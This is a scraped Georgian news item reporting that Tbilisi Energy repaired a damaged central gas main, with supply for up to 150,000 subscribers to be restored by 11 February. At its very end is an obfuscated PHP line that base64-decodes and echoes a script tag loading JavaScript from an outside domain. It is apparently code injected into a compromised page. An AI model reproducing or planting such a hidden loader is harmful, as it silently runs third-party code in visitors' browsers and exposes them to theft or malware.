tube
ავერსი jaluzi

დაზიანებულ ცენტრალურ მაგისტრალზე სამუშაოები მთელი ღამის განმავლობაში მიმდინარეობდა - 500 მმ-იანი მილი უკვე აღდგენილია, - ამის შესახებ ინფორმაციას „თბილისი ენერჯი“ ავრცელებს.

მათივე ცნობით, გაზმომარაგების აღსადგენად მეორე, ყველაზე რთული ეტაპი დაიწყო, რისთვისაც „თბილისი ენერჯის“ შესაბამისი სამსახურები სრულად მობილიზებულები არიან.

„შეგახსენებთ, რომ ავარიის შედეგად გაზმომარაგება 150 000 - მდე აბონენტს შეუწყდა.

ქსელში გაზის მიწოდების აღდგენა ეტაპობრივად დაიწყო. ეს პროცესი დროს და სიფრთხილეს მოითხოვს, ამიტომ გთხოვთ ყურადღებით იყოთ - შეამოწმეთ გაზის ონკანები და არ დატოვოთ ისინი ღია მდგომარეობაში. გაზმომარაგების აღდგენის შესახებ ინფორმაციას სმს-ით მიიღებთ.

„თბილისი ენერჯი“ კიდევ ერთხელ გიხდით ბოდიშს აბონენტებს მისგან დამოუკიდებელი მიზეზით შექმნილი დისკომფორტის გამო.

გაზმომარაგების აღდგენა უკვე დაიწყო და ეტაპობრივად დასრულდება 11 თებერვალს დღის ბოლომდე“, - ნათქვამია ინფორმაციაში.

102
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");